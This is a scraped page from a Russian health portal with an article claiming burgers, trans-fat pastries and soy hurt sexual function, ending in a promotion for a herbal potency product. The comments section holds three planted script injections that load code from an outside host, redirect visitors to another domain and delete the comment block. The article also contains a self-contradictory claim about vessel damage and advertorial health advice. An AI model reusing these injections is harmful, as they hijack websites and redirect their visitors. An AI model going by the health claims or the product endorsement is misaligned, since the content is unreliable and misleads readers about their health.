Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  3 продукта, которые не да...  >>  3 продукта, которые не дают вам заниматься сексом
 
Обратная связь
 

3 продукта, которые не дают вам заниматься сексом

Размер шрифта
10 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Любой из нас когда-то проводил половину воскресенья в полудреме после обильного обеда. Ни для кого не секрет, что самочувствие напрямую зависит от того, что мы едим. Оказывается, еда влияет и на интимные отношения и может не позволить вам заняться сексом!

Виновник: гамбургер с беконом

Опасность: не секрет, что жиры, находящиеся в сыре и мясе, могут вызывать образование бляшек в сосудах. Оказывается, в первую очередь повреждаются нежные сосуды полового члена и влагалища. И у мужчин, и у женщин это приводит к повышенной чувствительности и возбудимости. А у мужчин это просто является главной причиной эректильной дисфункции. Так что теперь придется выбирать между отношениями с продавцами фаст фуда и вашим сексуальным партерном. Кстати, вряд ли вы когда-то желали предаться утехам после поглощения здоровенного бургера.

Виновник: ваши любимые булочки

Опасность: наверняка вы ни разу не слышали ни одного доброго слова про трансжиры. Спешим вам сообщить, что во всеми любимых булочках содержится огромное количество трансжиров. Ученые считают, что помимо образования бляшек в стенках артерий, трансжиры снижают уровень тестостерона, что, естественно, сказывается на потенции. Тестостерон отвечает за либидо, то есть за половое желание и влечение, и у мужчин, и у женщин!

Виновник: продукты с соей

Опасность: соя содержит эстрогены, которые могут снизить концентрацию тестостерона у мужчин. Это приведет и к снижению либидо, и к нарушению половой функции. Говорят, буддистские монахи едят тофу, чтобы обуздать сексуальное желание. К слову, эстрогены влияют еще и на возможность завести малыша: в 2008 году журнал «Репродукция Человека» (Human Reproduction) выяснил, что соя снижает количество сперматозоидов.

Еда является важным фактором в борьбе с эректильной дисфункцией. Но если вы питаетесь правильно, но чувствуете что вам чего-то не хватает в сексе или ваша эрекция вас не устраивает, урологи советуют адаптогены. Такие как немецкий растительный препарат Райлис. Это безопасные препараты, которые помогут вам достичь оптимальных результатов в сексе и повысят общий эмоциональный тонус.

Специально для мужчин и для женщин, которые волнуются за своих мужчин, наш специальный проект «Секс с мужчиной».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Секс при простатите: особенности и последствия   Обрезание после 35 лет предотвратит рак простаты! Осталось только найти желающих...   Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!   В лабораториях научились выращивать настоящие половые члены?  
09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить? 01 июля 2013Сладкая парочка против рака простаты! Соя + помидор!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Проблемы, с которыми справится секс. Часть 4
Лучшие позы для любых ситуаций
Чем полезен секс?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.